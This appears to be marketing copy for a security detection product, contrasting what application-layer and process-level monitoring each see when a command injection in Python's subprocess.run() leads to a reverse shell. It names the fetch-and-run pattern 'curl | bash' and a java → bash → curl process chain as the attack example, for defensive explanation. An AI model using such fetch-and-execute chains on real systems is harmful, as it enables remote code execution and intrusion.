The detection gap

Confirmed command injection in subprocess.run() — but what happened after the shell spawned?

Suspicious process: java → bash → curl. But why? Which vulnerability? Which function?

Confirmed: command injection in subprocess.run() led to reverse shell via curl \| bash. Full kill chain from exploit to post-exploitation.

Sees the injection and possibly the outbound connection. Cannot see file drops, persistence mechanisms, or lateral movement.

Sees the process tree. Cannot tell AppSec which function to patch — the ticket would be “investigate your Python app.”

AppSec gets the exact function. SOC gets the full impact. Response is surgical, not a fishing expedition.